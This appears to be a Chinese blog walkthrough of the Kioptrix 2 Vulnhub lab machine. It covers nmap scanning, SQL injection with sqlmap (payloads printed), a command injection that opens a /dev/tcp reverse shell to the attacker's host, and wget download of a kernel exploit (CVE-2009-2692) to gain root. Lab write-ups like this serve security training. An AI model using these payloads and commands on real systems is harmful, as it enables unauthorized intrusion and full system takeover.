kioptrix 2 渗透流程

kitha.

已于 2024-02-21 22:02:41 修改

阅读量118

点赞数 1

分类专栏： kioptrix系列靶机渗透 Vulnhub靶机实战文章标签： web安全网络安全 web 网络安全

于 2023-11-10 22:31:45 首次发布

本文链接：https://blog.csdn.net/braty_/article/details/134342209

版权

Vulnhub靶机实战同时被 2 个专栏收录

23 篇文章 1 订阅

订阅专栏

kioptrix系列靶机渗透

5 篇文章 0 订阅

订阅专栏

信息收集

1.存活扫描

nmap -sn 192.168.229.1/24

nmap -sn 192.168.229.1/24                                             
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-06 20:58 EST
Nmap scan report for 192.168.229.69  //发现靶机
Host is up (0.00047s latency).
MAC Address: 00:0C:29:EA:A2:84 (VMware)
Nmap scan report for 192.168.229.73
Host is up.
MAC Address: 1A:A0:01:1C:61:2B (Unknown)
Nmap scan report for 192.168.229.85
Host is up (0.21s latency).
MAC Address: 92:5E:53:E7:CD:5E (Unknown)
Nmap scan report for 192.168.229.136
Host is up (0.12s latency).
MAC Address: 58:1C:F8:E0:85:B7 (Intel Corporate)
Nmap scan report for 192.168.229.247
Host is up (0.00026s latency).
MAC Address: A0:59:50:BC:A9:49 (Intel Corporate)
Nmap scan report for 192.168.229.234
Host is up.
Nmap done: 256 IP addresses (6 hosts up) scanned in 5.69 seconds

2.端口扫描

nmap -sT -p- -Pn 192.168.229.69

Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-06 21:12 EST
Nmap scan report for 192.168.229.69
Host is up (0.0038s latency).
Not shown: 65528 closed tcp ports (conn-refused)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
111/tcp  open  rpcbind
443/tcp  open  https
631/tcp  open  ipp
655/tcp  open  tinc
3306/tcp open  mysql

Nmap done: 1 IP address (1 host up) scanned in 3.92 seconds

3.服务扫描

nmap -sT -sV -sC--version-all -O -p 22,80,111,443,631,655,3306 192.168.229.69

Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-06 21:15 EST
Nmap scan report for 192.168.229.69
Host is up (0.00046s latency).

PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 3.9p1 (protocol 1.99)
|_sshv1: Server supports SSHv1
| ssh-hostkey: 
|   1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
|   1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_  1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
80/tcp   open  http     Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp  open  rpcbind  2 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100024  1            652/udp   status
|_  100024  1            655/tcp   status
443/tcp  open  ssl/http Apache httpd 2.0.52 ((CentOS))
|_ssl-date: 2023-12-07T00:06:16+00:00; -2h09m29s from scanner time.
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|_    SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-10-08T00:10:47
|_Not valid after:  2010-10-08T00:10:47
|_http-server-header: Apache/2.0.52 (CentOS)
631/tcp  open  ipp      CUPS 1.1
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
| http-methods: 
|_  Potentially risky methods: PUT
655/tcp  open  status   1 (RPC #100024)
3306/tcp open  mysql    MySQL (unauthorized)
MAC Address: 00:0C:29:EA:A2:84 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
Network Distance: 1 hop

Host script results:
|_clock-skew: -2h09m29s

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.40 seconds

WEB渗透：

访问页面发现一个登录页面：

http://192.168.229.69

4.SQL注入

这里我们先利用burp suite判断是post传参类型，借助数据包，利用sqlmap一把梭。

将数据包写入 1.txt，sqlmap -r 指定文件来注入

┌──(root㉿kali)-[/home/kali/Desktop]
└─# sqlmap -r '1.txt' --level 5 --risk 3
        ___
       __H__                                                                          
 ___ ___[']_____ ___ ___  {1.7.8#stable}                                              
|_ -| . [(]     | .'| . |                                                             
|___|_  [']_|_|_|__,|  _|                                                             
      |_|V...       |_|   https://sqlmap.org                                          

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 22:10:51 /2023-12-06/

[22:10:51] [INFO] parsing HTTP request from '1.txt'
[22:10:51] [INFO] testing connection to the target URL
[22:10:51] [INFO] testing if the target URL content is stable
[22:10:52] [INFO] target URL content is stable
[22:10:52] [INFO] testing if POST parameter 'uname' is dynamic
[22:10:52] [WARNING] POST parameter 'uname' does not appear to be dynamic
[22:10:52] [WARNING] heuristic (basic) test shows that POST parameter 'uname' might not be injectable
[22:10:52] [INFO] testing for SQL injection on POST parameter 'uname'
-------------
Parameter: psw (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: uname=admin&psw=-3635' OR 6390=6390-- ZtJm&btnLogin=Login

    Type: time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (BENCHMARK)
    Payload: uname=admin&psw=rooot' AND 4175=BENCHMARK(5000000,MD5(0x4c677766))-- LVAp&btnLogin=Login

Parameter: uname (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: uname=-3300' OR 1388=1388-- yOfD&psw=rooot&btnLogin=Login

    Type: time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (BENCHMARK)
    Payload: uname=admin' AND 3078=BENCHMARK(5000000,MD5(0x6c69784a))-- YDPQ&psw=rooot&btnLogin=Login
---
there were multiple injection points, please select the one to use for following injections:
[0] place: POST, parameter: uname, type: Single quoted string (default)
[1] place: POST, parameter: psw, type: Single quoted string
[q] Quit
>

拿到payload了，这里sqlmap注入完成给我们提供了3个payload，随便拿一个进行登录尝试，发现登录成功，是一个ping功能的命令

5.远程命令执行（绕过）

发现执行成功

我们尝试反弹shell，

kali：nc -lvvp 4444

web：127.0.0.1 && /bin/sh -i >& /dev/tcp/192.168.229.234/4444 0>&1

6.提权

我们尝试内核提权，searchsploit 查询下载漏洞，开启http服务，靶机下载并执行。

searchsploit linux 2.6 centos

searchsploit -m 9479.c

python3 -m http.server 8080

                                                                                      
┌──(root㉿kali)-[/home/kali/Desktop]
└─# searchsploit linux 2.6 centos
----------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                     |  Path
----------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Linux Kernel 2.4.x/2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SuSE 10 SP2/11 / Ubuntu 8.10) (PPC) - 'sock_sendpage()' Local Privilege  | linux/local/9545.c
Linux Kernel 2.4/2.6 (RedHat Linux 9 / Fedora Core 4 < 11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' Ring0 Privilege Escalation  | linux/local/9479.c
Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip_append_data()' Ring0 Privilege Escalation ( | linux_x86/local/9542.c
Linux Kernel 2.6.32 < 3.x (CentOS 5/6) - 'PERF_EVENTS' Local Privilege Escalation (1)                                              | linux/local/25444.c
Linux Kernel 2.6.x / 3.10.x / 4.14.x (RedHat / Debian / CentOS) (x64) - 'Mutagen Astronomy' Local Privilege Escalation             | linux_x86-64/local/45516.c
----------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
                                                                                                                                                                     
┌──(root㉿kali)-[/home/kali/Desktop]
└─# searchsploit -m 9479.c       
  Exploit: Linux Kernel 2.4/2.6 (RedHat Linux 9 / Fedora Core 4 < 11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' Ring0 Privilege Escalation (5)
      URL: https://www.exploit-db.com/exploits/9479
     Path: /usr/share/exploitdb/exploits/linux/local/9479.c
    Codes: CVE-2009-2692, OSVDB-56992
 Verified: True
File Type: C source, ASCII text
Copied to: /home/kali/Desktop/9479.c


                                                                                                                                                                     
┌──(root㉿kali)-[/home/kali/Desktop]
└─# python3 -m http.server 8080  
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...

靶机下载脚本命令并执行

wget http://192.168.229.234:8080/9479.c

gcc -o 1 9479.c

sh-3.00# wget http://192.168.229.234:8080/9479.c
--20:54:16--  http://192.168.229.234:8080/9479.c
           => `9479.c'
Connecting to 192.168.229.234:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3,378 (3.3K) [text/x-csrc]

    0K ...                                                   100%  247.81 MB/s

20:54:16 (247.81 MB/s) - `9479.c' saved [3378/3378]

sh-3.00# ls
9479.c
sh-3.00# gcc -o 1 9479.c
9479.c:130:28: warning: no newline at end of file
sh-3.00# ls
1
9479.c
sh-3.00# ./1
[-] check ur uid
sh-3.00# id
uid=0(root) gid=0(root) groups=48(apache)
sh-3.00# whoami
root
sh-3.00